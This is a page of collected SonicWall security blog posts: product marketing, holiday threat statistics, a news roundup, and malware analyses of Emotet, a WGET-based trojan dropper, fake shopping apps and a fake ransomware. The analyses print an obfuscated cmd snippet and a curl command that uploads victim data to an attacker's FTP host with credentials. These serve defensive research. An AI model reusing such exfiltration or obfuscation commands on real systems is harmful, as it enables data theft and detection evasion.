3 Ways to Prevent Cryptominers from Stealing Your Processing Power

/0 Comments/in /by

Visiting a website is no longer what it used to be.

Despite this hilarious Imgur post, there is a different trend you may not have noticed: cryptomining via the browser. Many news and procrastination (e.g., BuzzFeed) websites add dozens of trackers to monetize the experience.

However, some sites may also use your browser to mine cryptocurrencies (e.g., bitcoin, Ethereum or Monero) for their own financial gain. The mining stops once you leave, but there is a popular new form of malware that attempts to turn your device into a full-time cryptocurrency mining bot called a cryptojacker. Cryptojacking’s threat to your endpoint or business is based on three things:

  • The energy it consumes or wastes
  • The damage it can do to a system
  • The loss to productivity due to limited resources.

Unlike ransomware that wants to be found (to ask for payment), a cryptojacker’s job is to run invisibly in the background although your CPU performance graph or device’s fan may indicate something is not normal.

Despite our vigilance and knowledge of the warning signs, a report from the Ponemon Institute stated the average length of time for an organization to discover malware or a data breach in 2017 was 191 days.

Ransomware authors have switched gears over the past two years to use cryptojacking more, because a ransomware strain’s effectiveness and ROI diminish as soon as it ends up on public feeds like VirusTotal. Like anyone else running a highly profitable business, cybercriminals need to constantly find new ways to fulfill their financial targets. Cryptojacking may solve that.

For example, the Apple App Store briefly carried a version of a free app called ‘Calendar 2’ that mined Monero cryptocurrency while open. It reportedly made $2,000 in two days before it was pulled from the App Store.

The Lure of Cryptomining

Cryptomining operations have become increasingly popular, now consuming almost half a percent of the world’s electricity consumption. Despite the wild swings in price, roughly 60 percent of the cost of legitimately mining bitcoin is the energy consumption. In fact, at the time of writing, the price of a bitcoin is worth less than the cost of mining it legitimately.

With such costs and zero risk as compared to buying and maintaining equipment, cybercriminals have strong incentives to generate cryptocurrency with someone else’s resources. Infecting 10 machines with a cryptominer could net up to $100/day, so the challenge for cryptojackers is three-fold:

  1. Find targets, namely organizations with a lot of devices on the same network, especially schools or universities.
  2. Infect as many machines as possible.
  3. Unlike ransomware, and more akin to traditional malware, stay hidden for as long as possible.

Cryptojackers use similar techniques as malware to sneak on to an endpoint: drive-by downloads, phishing campaigns, in-browser vulnerabilities and browser plugins, to name a few. And, of course, they rely on the weakest link — the people — via social engineering techniques.

How to Know if You are Infected by Cryptominers

Cryptominers are interested in your processing power, and cryptojackers have to trade off stealth against profit. How much of your CPU resources they take depends on their objectives.

Siphoning less power makes it harder for unsuspecting users to notice. Stealing more increases their profits. In either case, there will be a performance impact, but if the threshold is low enough it could be a challenge to distinguish the miner from legitimate software.

Enterprise administrators may look for unknown processes in their environment, and end users on Windows should spawn a Sysinternals Process Explorer to see what they are running. Linux and macOS users should investigate using System Monitor and Activity Monitor, respectively, for the same reason.

How to Defend Against Cryptominers

The first step in defending against cryptominers is to stop this type of malware at the gateway, either through firewalls or email security (perimeter security), which is one of the best ways to scrub out known file-based threats. Since people like to reuse old code, catching cryptojackers like CoinHive can be a simple first step.

If the malware strain is unknown (new or updated), then it will bypass static filters in perimeter security. If a file is unknown, it will be routed to a sandbox to inspect the nature of the file.

In the case of SonicWall Capture ATP, the multi-engine sandbox environment is designed to identify and stop evasive malware that may evade one engine but not the others.

If you have an endpoint not behind this typical set up (e.g., it’s roaming at the airport or hotel), you need to deploy an endpoint security product that includes behavioral detection.

Cryptominers can operate in the browser or be delivered through a fileless attack, so the legacy solutions you get free with a computer are blind to it.

A behavioral-based antivirus like SonicWall Capture Client would detect that the system wants to mine coins and then shut down the operation. An administrator can easily quarantine and delete the malware or, in the case of something that does damage to system files, roll the system back to the last known good state before the malware executed.

By combining a mixture of perimeter defenses and behavioral analysis, organizations can fight the newest forms of malware no matter what the trend or intent is.

To learn more about how you can defend your organization from these threats I recommend reading this white paper, “Best Practices for Protection Against Phishing, Ransomware and Email Fraud.”

Cyber Monday, Black Friday Targeted by Spike in Ransomware Attacks

/0 Comments/in , /by

Throughout the year, SonicWall tracks cyber threats around the clock. But the holiday shopping season — specifically the days around Thanksgiving — is anything but typical.

During this nine-day window, cybercriminals plan and execute cyberattacks, even before the early hours of Black Friday. They systematically build malware, ransomware and phishing campaigns to prey on busy holiday shoppers.

For the 2018 holiday shopping season, SonicWall Capture Labs threat researchers focused on the three key shopping days — Black Friday, Small Business Saturday and Cyber Monday — that anchor Thanksgiving week in the U.S.

At a macro level, malware attacks dipped in 2018, while ransomware, phishing and cryptojacking attacks all increased significantly. Over the nine-day Thanksgiving holiday shopping window (Nov. 19-27), SonicWall customers faced:

  • 91 million malware attacks (34 percent decrease over 2017)
  • 889,933 ransomware attacks (432 percent increase over 2017)
  • 45 percent increase in phishing attacks compared to the average day in 2018

Malware Volume Dips for Holiday Shopping, Still Trending High in 2018

Malware data trends represent one of the best indicators of cybercriminal tactics and big-picture strategies. After a relatively down 2016, malware volume surged in 2017 to record levels, increasing 18.4 percent, as published earlier this year in the 2018 SonicWall Cyber Threat Report. Through October 2018, malware attacks were already up 44 percent year to date.

However, U.S. malware attacks were actually down, across the board, during the Thanksgiving holiday. This moderate decline in the use of malware includes a 47 percent drop on Cyber Monday and a 40 percent decrease on Black Friday, the two biggest shopping dates of the season.

U.S. Malware Attacks | Thanksgiving Holiday

Shopping Days20172018YoY
Thanksgiving Holiday Nov. 19-27139,163,47691,442,673-34%
Black Friday13,082,2167,797,134-40%
Small Business Saturday12,407,8438,004,621-35%
Cyber Sunday16,267,04310,890,572-33%
Cyber Monday22,662,09011,927,016-47%

This regression likely signifies that criminals are narrowing the focus to the most profitable types of attacks, such as ransomware, which spiked during the 2018 holiday shopping season.

Malware attacks dipped on each of the major shopping days in 2018, but overall malware volume has nearly doubled 2017 year to date.

As Black Friday Shoppers Stay Online, Ransomware Climbs

A decades-old tradition, Black Friday used to be the biggest shopping day of the year. But even with the emergence of Cyber Monday, more and more consumers are doing their Black Friday shopping online and not in brick-and-mortar stores.

SonicWall Capture Labs threat researchers recorded 28 times more ransomware attacks on Black Friday compared to 2017.

According to Reuters, online sales surpassed $6 billion on Black Friday in the U.S. — a 23 percent jump over last year. Conversely, sales at physical retail locations dropped 4-7 percent.

And, predictably, cybercriminals were waiting. SonicWall Capture Labs threat researchers recorded 28 times more ransomware attacks on Black Friday compared to 2017. In November, the infamous Cerber ransomware variant was the most prevalent, representing 76 percent of all ransomware attacks.

U.S. Ransomware Attacks | Thanksgiving Holiday

 Shopping Days20172018YoY
Thanksgiving Holiday Nov. 19-27167,388889,933432%
Black Friday4,088113,3032,672%
Small Business Saturday10,171103,611919%
Cyber Sunday16,25170,727335%
Cyber Monday24,425109,298347%

Each major shopping day saw triple-digit jumps over the same dates in 2017. Interestingly, ransomware attacks on Small Business Saturday — likely bleed over from Black Friday — were up 919 percent over 2017.

From a volume standpoint, Cyber Monday only trailed Black Friday in total attacks, further signifying shifting cybercriminal strategies that focus on more than specific shopping days for better success. These trends continued upward for the Tuesday following Cyber Monday as well.

Ransomware attacks were up across the board for Black Friday and Cyber Monday.

In January, SonicWall Capture Labs threat researchers will analyze data and publish findings from the entire shopping season to help the industry better understand cybercriminal strategies and their shifting behavior patterns.

This cyber threat intelligence will also serve as a precursor to the 2019 SonicWall Cyber Threat Report, which will be published early next year.

Exclusive Video: SonicWall CEO Bill Conner & CTO John Gmuender

SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks.

SonicWall Wins Gold and Silver in Best in Biz Awards 2018

/0 Comments/in /by

SonicWall has been named a multiple winner in the 8th annual Best in Biz Awards, the only independent business awards program judged each year by prominent editors and reporters from top-tier publications in North America.

Best in Biz Awards 2018 honors were conferred in 70 award categories across five focus areas: company; department or team; executive; product; and CSR, media, PR and other categories. SonicWall received Best in Biz honors in in two categories, as a gold winner for the Most Innovative Product of the Year and a silver winner for the Support Department of the Year.

With the addition of the Best in Biz Awards, SonicWall has won 44 industry honors so far in 2018.

SonicWall’s Capture Cloud Platform took the gold award in the Most Innovative Product of the Year – SMB category. The Capture Cloud Platform combines the global security intelligence of the Capture Threat Network with the cloud-based management, reporting and analytics of the Capture Security Center and the advanced threat prevention of the multi-engine Capture ATP sandbox. This approach enables our complete portfolio of high-performance hardware, virtual appliances and clients to harness the power of the cloud.

SonicWall’s Global Support team, under the leadership of SVP and Chief Customer Success Officer Keith Trottier, was recognized with a silver award in the Support Department of the Year category. SonicWall is proud to provide dedicated, follow-the-sun service and support with global contact centers that are staffed 24/7 with technical support and customer service teams.

“All of the entries in the Service categories in this year’s Best in Biz Awards take the meaning of ‘service’ seriously – whether it is targeting individuals, companies or employees,” said Mari Edlin, Healthcare Innovation News, judging her third Best in Biz Awards competition. “Submissions represented an entirely new service, while others added an innovative touch to their other offerings, enhancing already existing, similar products. Hats off to everyone for keeping good service alive!”

Since 2011, winners in Best in Biz Awards have been determined based on scoring from independent judging panels deliberately composed each year of prominent editors and reporters from some of the most respected newspapers, TV outlets, and business, consumer, technology and trade publications in North America. Structured in this unique way, Best in Biz Awards is able to best leverage its distinguished judges’ unparalleled expertise, experience and objectivity to determine award winners from among the hundreds of entries. This year’s judging panel included writers and contributors to such publications as Associated Press, Barron’s, Consumer Affairs, eWeek, Forbes, Healthcare Innovation News, Inc., Investment Advisor Magazine, MediaPost, New York Post, New York Times, Ottawa Citizen and Wired.

For a full list of winners in Best in Biz Awards 2018, visit: http://www.bestinbizawards.com/2018-winners

About Best in Biz Awards

Since 2011, Best in Biz Awards has made its mark as the only independent business awards program judged each year by a who’s who of prominent reporters and editors selected from top-tier publications from North America and around the world. Over the years, Best in Biz Awards judges have ranged from Associated Press to the Wall Street Journal and winners have spanned the spectrum, from blue-chip companies that form the bedrock of the world economy to local companies and some of the most innovative start-ups. Best in Biz Awards honors are conferred in two separate programs: North America and International, and in 70 categories, including company, team, executive, product, and CSR, media, PR and other categories. For more information, visit: http://www.bestinbizawards.com.

Cyber Security News & Trends – 11-23-18

/0 Comments/in /by

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

Two Cybersecurity Policies, One Clear New Objective – The Hill

  • SonicWall CEO Bill Conner has written an op-ed with his three policy prescriptions for the U.S. government following the National Institute of Standards and Technology (NIST) Small Business Cybersecurity Act and The National Cyber Strategy being signed into law.

Historic Black Friday, Cyber Monday Threat Data Prepares Businesses, Shoppers for Holiday Cyberattacks – SonicWall Blog

  • With Black Friday and Cyber Monday upon us cybercriminals are working overtime to find a gap in your cyber defense. We look at last year’s leap in malware attacks and advise on how to protect your business.

SonicWall Launches SD-WAN, Risk Metrics and New UTM Hardware – eWEEK

  • Sean Michael Kerner, senior editor at eWEEK, speaks to SonicWall’s Lawrence Pingree about SonicWall’s recent product expansion.

5 Key Skills for Next-Gen Communicators – Commpro

  • SonicWall’s David Chamberlin was recently featured on a panel discussion, How To Stay Relevant as a Communications Executive in 2020. Commpro has pulled the discussion together into a handy infographic.

Cyber Security News

Amazon Data Breach Reveals Private Details of Customers Ahead of Black Friday – The Telegraph (UK)

  • On the eve of some of the busiest shopping days of the year, Amazon confirmed a leak of customer names and emails.

VisionDirect Blindsided by Magecart in Data Breach – Threat Post

  • After VisionDirect confirmed a data breach exposing full names, addresses, telephone numbers, email addresses, passwords and payment card data, security researchers are saying this is the latest case of the ever-prolific Magecart threat group.

Security Warning: UK Critical Infrastructure Still at Risk From Devastating Cyber Attack – ZDNet

  • With the head of the UK National Cyber Security Centre previously stating that a major cybersecurity attack is a matter of “when, not if”, a new report from the UK’s Joint Committee on the National Security Strategy says the UK is still not facing up to cybersecurity threats.

Nine Cyber Security Predictions for 2019 – CSO Online

  • Ransomware, regulation, cyberwarfare and more; CSO Online tries to predict where cybersecurity will go over the next 12 months.

Facebook Appeals Against Cambridge Analytica Fine – BBC (UK)

  • Facebook is appealing their £500,000 fine, arguing that there is no evidence that any UK citizens had their data shared with Cambridge Analytica.

L0rdix Becomes the New Swiss Army Knife of Windows Hacking – ZDNet

  • A new malware called L0rdix has been found by researchers. It still looks to be in the development stages but it already manages to combine cryptocurrency mining, data theft and the ability to avoid malware analysis.

Report Reveals Struggles of SMBs Navigating Cyber Threat Landscape – SC Magazine

  • A recent study of Small and Medium Sized Businesses found over half of those surveyed have suffered from a data breach in the past year. Most respondents blame insufficient staff or cash, and a general lack of understanding of the threat landscape. SonicWall’s Charles Ho has some suggestions.

In Case You Missed It

Emotet is back for the holidays

/in /by

Two weeks ago, SonicWall Threat Research Lab had researched and blogged about a large malspam campaign delivering Emotet. Emotet has come back again for holiday season with different tactics and better obfuscation techniques. These spam emails in Thanksgiving theme are sent in very large numbers with malicious XML attachment.

Infection Chain:

Email:

On November 20th, the below spam email is sent out with thanksgiving greetings. it pretends to be coming from valid email addresses with valid full names.

XML:

The malicious attachment is not a Word document, it’s an XML document. Looks like malicious word document with VB macros and shell code is converted to  XML to evade from signature based detection.

Later the malicious XML document extension has been altered from .xml to .doc in order to launch it in Microsoft word, the  default program for .doc extension

The attachment opens in Microsoft word and requests user to enable macro.

Upon enabling macros, the shell code shown below gets executed

ShellCode Deobfuscation:

Escape character (^), the caret is used in obfuscation by breaking up the command string to evade from signature based detection. By escaping the escape character and ignoring semicolon from the above shown shell code, we shall retrieve the below
Step 1: 
Here obfuscation is done through existing environment variable values.
cmd /c C%PrOgrAMfILES(x86):~  +9, +1%D; /v: /%APPdATA:~ 6,  1% “;

Environment variables:

ProgramFiles(x86)=C:\Program Files (x86)
APPDATA=C:\Users\user\AppData\Roaming

The Programfiles(x86) environment variable contains the character ‘m’ at the 9th index. so replacing “%PrOgrAMfILES(x86):~  +9, +1%” with ‘m’  and likewise replacing %APPdATA:~ 6,  1% with ‘r’ yields

 cmd /c CmD /v:/r
Step 2:
Set variable “cd1” as shown below.
Step 3:
“fOr /L %E IN ( +1559 -3 +2) do (sET uYi=!uYi!!cd1:~  %E,   1!) && If %E ==2 ((call %uYi:~ -520%))”
Reversal payload obfuscation is being used to encode commands. The reversed command is initially set in the environment variable “cd1” in step 2. The /L  flag instructs the for loop to iterate over a range of values starting from the first value (1559), decrement by the second value (-3) until it reaches the third value (i.e 2).
when it reaches 2, uYi will have the below string.
After applying all the above steps, we get
cmd /v:ON /r “<powershell command>”

PowerShell:

PowerShell script uses XMLHTTP object (MSXML2.XMLHTTP) to send an arbitrary HTTP request to download the payload. And it uses the stream object to save the binary contents to a file in the system temporary path. Finally starts running the payload

Payload:

Upon execution, the initial payload drops the Emotet malware which then connects to the C2C server

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • GAV: MalAgent.H_13035 (Trojan)
  • GAV: Emotet (Trojan)
  • GAV: MalAgent.H_13037 (Trojan)

Trend Chart:
Find below the hits for the GAV signature “MalAgent.H_13037”

Hash:

Email:

70f2001db275cd64b4479170e577256d9c23641254ef6f6bbc86a7da06027b82

XML:

947fd45284f627d42976f1dc2e17eb37dd43572801def4c6de4aa0b59468858a
c73a1ca2ea93c9dba1b6fd987fa1921890f51b87be5e792cc4184e250c0aeecf

Payload:

efe368ee739ef9ce068bdf624df783121fd84917bc69fcb0d9faaf8fda8a84f6
e00cd6e2a69ab6d8478951333fce0d834d5bf350a4add1bc11c7c209e002520b

Infection Cycle of WGET Trojan Dropper, November 2018.

/in /by

Overview:

SonicWall, network sensor telemetry reported a malicious sample that displayed the following DNS and User-Agent information. So, lets take a deeper look into the sample:

Static Sample Information:

Sample SHA-256: 816f756d39c6cf9e885c76166e2e194377e475d46e23f61ea3582c3ab5340187

Reviewing some of the static information from CFF Explorer we can see the data inside (File Info):

Unpacking Sample:

The sample is packed with UPX v3.0. Using CFF Explorer we can unpack the sample:

After we unpack the sample and throw it inside Ida Pro we see the following strings:

At this point we know the sample is a self-extracting installer. So, we can use 7zip to unzip the sample. After unzipping the sample the directory structure will look like the following:

Script Code Base:

Examining the “upsabi.bat” batch file we see the following code:


There are multliple code paths to the script above. SonicWall’s sensor seen the following sequence:

  • execute “wdet.exe”
  • execute “qtu.exe”
  • execute “wdet.exe” a few more times for alt.bat and gptsvcer.exe
  • execute “grafil.exe”
  • dex.crt was found
  • execute “renimin.exe”
  • deleted multiple files from the machine

We will first look into “wdet.exe” next…

Wdet.exe

Examining wdet.exe we see the following strings inside Ida Pro:

We know by the analysis above that “wdet.exe” is “GNU Wget” in disguise.
You can see further information on Wget for Windows here:
http://gnuwin32.sourceforge.net/packages/wget.htm

The first part of the batch file “upsabi.bat” is to delete “updpars.exe” and copy the “nvidup.exe” over to the system32 folder. Once that is complete it will call “qtu.exe”.

HTTP Network Objects

The network objects are obtained from running and trapping the malware sample.

Let’s examine “qtu.exe” the next executable in the sequence above.

qtu.exe

Carving out “qtu.exe” from the network traffic we see this inside CFF Explorer:

From the static information the sample doesn’t seem to be packed or protected.
However, when we throw the sample into Ida Pro we see the following strings:

The analysis shows that “qtu.exe” is also a self-extracting installer. One in which we can also use 7zip to unzip the sample. The directory structure can be seen as follows:

Inside “0.html” we see the following:


Inside the code we can find words that are in Russian as in “—ледующее” translating to “-Next”.
There are many words in Russian. It would be safe to say, that this component is Russian created.

One Google search on “webq wikaba” will return 75,200 results about the same malware components we are discussing here in this article. It’s a large campaign spanning many years. They keep using the same components over and over.

The next component “upsabi.bat” will try to download is “alt.bat”.

alt.bat

The wget responses received were 404 for alt.bat the driver component. We can reference “**BAYDU-404**”.

This component is missing as the sensor was unable to connect to the following information.

We did gain valuable information from the response in the form of two urls:

  • hxxp://cnhv.co/7utq
  • hxxp://searchguide.level3.com/search/?q= “custom location”

Response 1:

Response 2:

The next component “upsabi.bat” will try to download is “gptsvc.exe” which will rename to “gptsvcer.exe”.

gptsvc.exe OR gptsvcer.exe

The wget responses received were also 404 for gptsvc.exe. We can also reference “**BAYDU-404**”.

This component is missing as the sensor was unable to connect to the following information.

Again the same valuable information from the response in the form of two urls:

  • hxxp://cnhv.co/7utq
  • hxxp://searchguide.level3.com/search/?q= “custom location”

Response 1:

Response 2:

Taking a step back and reexamining “upsabi.bat”. The batch file will move and rename multiple files and finally arrive to download and execute “grafil.exe” next.

grafile.exe

Looking at “grafile.exe” in Ida Pro we see the following strings:

The analysis shows that “grafil.exe” is also a self-extracting installer. One in which we can also use 7zip to unzip the sample and we see the following directory:

Examining the “filgra.bat” we see the following code:

One of the items that is saved to a .SNDR sound file is your IP Address. This enables the attacker to connect back to you. Gaining your external IP address is done by first understanding what is inside “gettip.exe”. Let’s examine it:

The file “gettip.exe” is packed with what seems like UPX v3.0 however it is a custom derivative of it. We can walk through the packer now and unpack the sample:

First Routine is a call to LoadLibraryA:

Second Routine is a call to GetProcAddress:

The Third call is to Virtual Protect:

After this sequence we will then arrive at a jump at the very bottom of the routine:

This is the Original Entry Point Jump: ( jmp near ptr dword_401280 ). Once we arrive at this jump at the end of the routine we can step into it. Then dump the process.

Once we dump the process we can look at the code that grabs our IP address:

This is the website your IP will be uploaded to:

  • curl -T *.SNDR ftp://debrup:toperharley@grafil.ninth.biz:22

Other network code inside the sample:

Once again we see the Russian language ( ru ).

The other file in the directory is “curl.exe” if we throw this into CFF Explorer we see:

If you are more curious you can throw the “curl.exe” into Ida Pro at this point I don’t think we need too.

Moving on back to the “upsabi.bat” we see the next set of commands which calls “renimin.exe” because dex.crt was on the machine:

  • ( if exist %windir%\dex.crt (goto renim) )

Let’s examine this file next.

renimin.exe

Static Information for “renimin.exe”:

We can unpack and unzip “renimin.exe” the same way we did the last few files.

One complete you will have a directory listing as follows:

Let’s look at “inst.bat” first:




The first executable that is executed is called “restr.exe”. This is also packed with UPX and is a self-extracting installer. Which means we can also use 7zip to unzip the dumped “restr.exe”. The directory structure then looks like the following:

A look into “ins.bat”:


A look into “hddsmart.bat”:

Going back to “renimin.exe” directory listing we have the second batch file “intl.bat”:


Examining the“renimin.exe” directory listing and looking at the third batch file “errchk.bat”:

Summary:

The Infection cycle analysis has covered many samples. If we were to count scripts and executables there are close to thirty components maybe more. Also, the infection chain analysis is by no means complete. Feel free to examine each individual component. A small list of components covered is below (This list is not complete):

Starting Sample: SHA-256: 816f756d39c6cf9e885c76166e2e194377e475d46e23f61ea3582c3ab5340187

SonicWALL Gateway AntiVirus, provides protection against this threat:

  • GAV: 4923 Murlo.JK

Historic Black Friday, Cyber Monday Threat Data Prepares Businesses, Shoppers for Holiday Cyberattacks

/0 Comments/in /by

It’s officially Thanksgiving week in the U.S. In addition to gathering with family and friends for the traditional turkey meal, many of us get excited about the holiday shopping season, which kicks off with Black Friday, goes virtual on Cyber Monday and extends through New Year’s Day.

If you’re looking to get a great deal on just about anything, this is the best time of the year to make that purchase. Everyone knows this, including cyber criminals. And that’s a problem for many organizations.

Perhaps as ominous foreshadowing, Amazon announced that a “technical error” exposed customer names and email addresses — days before Black Friday and Cyber Monday even got started.

Employees Will Make Personal Online Purchases on Corporate Time, Machines

Online shopping is a popular activity, both at home and in the office. It’s even more prevalent during the holiday shopping season. In a recent survey from Robert Half Technology, almost 65 percent of respondents said they will spend at least some of their work time making holiday purchases online.

While no one wants to be a Scrooge during the holidays, every organization needs to have safeguards in place to protect against the inevitable increase in the number of cyberattacks that are coming.

2017 Holiday Cyberattacks Paint Picture for 2018 Shopping Season

To help organizations, retailers, and small- and medium-sized businesses (SMB) prepare, the SonicWall Capture Labs threat research team analyzed cyber threat data from the second half of 2017. Unsurprisingly, there was an enormous spike in the number of malware attacks last year on Cyber Monday, the biggest online shopping day of the year. Here are some of the official data points from 2017:

  • Cybercriminals launched more than 113 million malware attacks on Cyber Monday last year, a 4.4x increase over the yearly average
  • Malware attacks jumped 27 percent on Black Friday
  • Ransomware attacks spiked 127 percent on Cyber Monday

So, what does this mean for 2018? Expect your organization to see more of the same. But there are proven methods to stop the surge in holiday cyberattacks.

6 Security Layers Organizations Can Use to Mitigate Holiday Cyberattacks

We know employees will be spending time online at work surfing for deals and customers will make purchases at point-of-sale (POS) terminals, so there is some inevitable risk. And while the data does show a worrisome trend, there are things you can do to protect your network, endpoints and data from cyberattacks during the holiday shopping season.

The key is to have a layered, defense-in-depth approach, something SonicWall can help with through our automated real-time breach detection and prevention platform. From the outside in, here are the six layers we recommend:

  1. Next-Generation Firewall – The first line of defense, a next-generation firewall (NGFW) should have high security efficacy and use machine learning to identify and block malware, ransomware and other attacks at the gateway.
  2. Deep Packet Inspection of TLS/SSL-encrypted Traffic – The use of encryption to hide cyberattacks continues to grow at a fast pace, so it’s essential any NGFW is able to scan encrypted traffic for threats.
  3. Email Security – Email is a common threat vector for delivering attacks, often through attachments, making it critical that any solution be able to scan inbound and outbound email for phishing attacks and infected attachments.
  4. Multi-engine Sandboxing – While one engine is good, several is better when it comes to identifying and blocking never-before-seen cyberattacks. SonicWall Capture ATP is a multi-engine sandbox that features block-until-verdict safeguards.
  5. Real-Time Deep Memory Inspection – SonicWall’s patent-pending RTDMITM technology, included with Capture ATP, identifies and stops difficult-to-find threats hidden in memory where malware’s weaponry is exposed for less than 100 nanoseconds.
  6. Capture Client – Endpoint devices used beyond the firewall perimeter are more susceptible to attacks. Capture Client provides multiple advanced endpoint protection capabilities in addition to the ability to roll back to a previous point before malware entered or was activated on the device.

Next week, SonicWall Capture Labs threat researchers will publish their analysis on three key shopping dates in 2018: Black Friday, Small Business Saturday and Cyber Monday.

Until then, explore the Capture Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins, and monthly trends by attack type.

October 2018 Cyber Threat Data: Web App Attacks, Ransomware Continue Upward Trend

/0 Comments/in /by

Throughout 2018, we’ve been sharing monthly updates on the cyber threat data recorded and analyzed by SonicWall Capture Labs, highlighting cyberattack trends and tying it back to the overall cyber threat landscape.

Now, cyber threat intelligence from the SonicWall Capture Security Center is even deeper. The tool now provides empirical data on cyberattacks against web applications. In an increasingly virtual and cloud-connected world, protecting web apps is just as critical as defending more traditional networks.

In October, the overall number of web application attacks continued to rise sharply. We tracked over 1.8 million web app attacks, more than double the volume of attacks for the same time period in 2017.

One factor influencing this is the continued growth explosion of the Internet of Things (IoT), which has added billions of connected devices online, each bringing new and unique potential for vulnerabilities and weaknesses.

While the headline-grabbing news often focuses on processor attacks like Spectre or Meltdown, companies that aren’t using security measures, like SonicWall Capture Advanced Threat Protection with Real-Time Deep Memory Inspection (RTDMI), can leave their standard applications exposed and vulnerable to cybercriminals who are always looking for a weakness.

The volume of ransomware attacks also continued its global upward trend in October. So far in 2018 we’ve seen over 286 million worldwide attacks, up 117 percent from 132 million this time last year. On an individual customer level, that’s 57 attacks per day per customer, an increase from only 14 in October last year.

The growing frequency and complexities of cyberattacks paint a dire picture for global businesses of all sizes. The good news is that by assessing your business’s cybersecurity risk, improving overall security behavior, and ensuring that you are utilizing the right cybersecurity solutions for your business, it’s possible to protect your business from most data breaches.

October Attack Data

Globally, the SonicWall Capture Threat Network, which includes more than 1 million sensors across the world, recorded the following 2018 year-to-date attack data through October 2018:

  • 9.2 billion malware attacks (44 percent increase from 2017)
  • 3.2 trillion intrusion attempts (45 percent increase)
  • 286.2 million ransomware attacks (117 percent increase)
  • 23.9 million web app attacks (113 percent increase)
  • 2.3 million encrypted threats (62 percent increase)

In October 2018 alone, the average SonicWall customer faced:

  • 1,756 malware attacks (19 percent decrease from October 2017)
  • 819,947 intrusion attempts (17 percent increase)
  • 57 ransomware attacks (311 percent increase)
  • 8,742 web app attacks (185 percent increase)
  • 152 encrypted threats (12 percent increase)
  • 12 phishing attacks each day (19 percent decrease)

SonicWall Capture Security Center

SonicWall cyber threat intelligence is available in the SonicWall Security Center, which provides a graphical view of the worldwide attacks over the last 24 hours, countries being attacked and geographic attack origins. This view illustrates the pace and speed of the cyber arms race.

The resource provides actionable cyber threat intelligence to help organizations identify the types of attacks they need to be concerned about so they can design and test their security posture ensure their networks, data, applications and customers are properly protected.

Malicious Cyber activity roundup: The Thanksgiving week 2018 edition

/in /by

As retailers are gearing up with their Black Friday doorbuster deals, cybercriminals are also upping the ante to lure shoppers into clicking that malicious link or downloading that latest shopping app in exchange for deals and best prices on their most coveted items.

Here at the SonicWall Capture Labs, we have spent the last few weeks combing through file samples, websites and emails that have surfaced with all the sales, top deals and freebies. We rounded up some of the most common tricks cybercriminals use that consumers should watch out for.

Spam is still one of the top sources for shady deals that can lead victims to giving up their personal information. The spam emails we have seen have a common theme of trying to lure consumers to clicking malicious links embedded within the body of the email. Some of the common email subjects are:

  • Start your Discount Season on Thanksgiving Day! UP TO 90% off !
  • Spray in your mouth and drop 25 lbs by Thanksgiving
  • Thanksgiving Flash Sale
  • Last day to order in time in BlackFriday (free shipping) win $63
  • Don’t get caught by surprise this black Friday – Free credit scores for all!

We have also noticed an increase in the amount of phishing emails promising rewards and free money pretending to be from popular retailers such as Amazon, Walgreens, CVS or even banks.

  • Absa Rewards Ticket Interest Rate: 27.5% Logging Confirmation
  • CVS e-rewards , #9483255
  • you have amazon rewards ending tonight (vouch 9049229)
  • Your amazon.com: prime-rewards 101490715 expiring: scott2013 thanks
  • scott2013 here are your new walgreens-rewards ending tonight (wal-7761433937)

Looking further at the phishing email from Absa bank, for instance, the message promises an outrageous interest rate of 27.5%. Once you follow the link to claim the “reward”, the victim will be taken to a fake banking website different from the actual bank’s website asking for his online banking login information.

The “free” credit score spam email is similar. Once the victim clicks on the link, he will then be taken to a website asking for his personal information to get “instant access” to his credit scores.

Another example is from a retailer promising a discount of up to 90%! The victim will then be taken to a fake website. There is never a guarantee of ever receiving the products when you shop on such sketchy websites.

Since savvy shoppers have increasingly been downloading and using apps that are related to shopping when looking for deals this season, malware writers are spreading their malicious creations and target unsuspecting shoppers on mobile platforms.

We observed a few malicious Android samples with interesting app names that fall into line with the current shopping season:

  • Amazon Shopping
  • Aliexpress Shopping App
  • eBay
  • Jumia Online Shopping

When executed, these apps show similar behaviors – they communicate with malicious domains based on hardcoded links within the code:

As clearly visible, for each of these links the value of parameter “s“changes.

We saw the following GET requests to the host:

At the time of writing this blog the domain appears to have been taken down and therefore we did not see any further communication between the app and this domain.

Further investigation about the domain – sppromo.ru – gave us more insight about the widespread nature of this threat:

  • This campaign contains a number of different infected apps based on VirusTotal results for this domain. As shown below multiple links are present under this domain with different values for the variable s signifying multiple app names:

  • Multiple malicious apk files can be seen associated with this domain:

  • The Google Chrome browser even identifies this website as “deceptive” and gives a warning when this link is visited:

We analyzed a number of samples belonging to this threat, interestingly the earliest sample appears to be from mid-November 2018 indicating that this is a fairly new threat campaign. The timing of this campaign with Black Friday may be a coincidence, regardless it is possible that the attackers created more apk’s with shopping related names to increase their chances of infecting more unsuspecting users since they already have some apps with such names as mentioned earlier.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AndroidOS.SPP.DWNL (Trojan)

Here are some hashes of a few additional samples from this campaign:

    • Amazon
      • e95990e3b2392de60fd69d2cf912dcfd – Amazon Appstore Free Notifier
      • 085c5e419f0d86222ea08b95df765f92 – Amazon
      • 511c212badd33c870e3b8102daf8f8ab – Amazon Shopping
    • Shopping
      • 73e79c49410a31a3bc4c58d91ae8ca00 – Jumia Online Shopping
      • 4a62fb20248a6c5ea6930fb384895ad9 – Aliexpress Shopping App
      • f44cc20ce344fbd0880f98b816b4c1db – Aliexpress Shopping App
    • eBay
      • 8157c2c5ceb3f045781c4d09982329df – eBay
      • 578c92feaf233b90e56c25c21f3435c5 – eBay

 

 

Fake Ransomware just overwrites MBR but demands payment

/in /by

The SonicWall Capture Labs Threat Research Team have recently come across a fake ransomware trojan that pretends to hold a victim’s files hostage.  Although its ransom message is intimidating and a Monero address is provided for $200 payment there is no encryption functionality present in the malware.

 

Infection Cycle:

 

The attacker has made no effort to hide the functionality of the malware.  It was written in Delphi and is so straigtforward that even a simple listing of strings in the binary instantly reveal its purpose:

 

Running the executable through a debugger reveals its runtime functionality.  The first step is to verify whether physical access to the system drive is possible using the CreateFileA and ReadFile API calls:

 

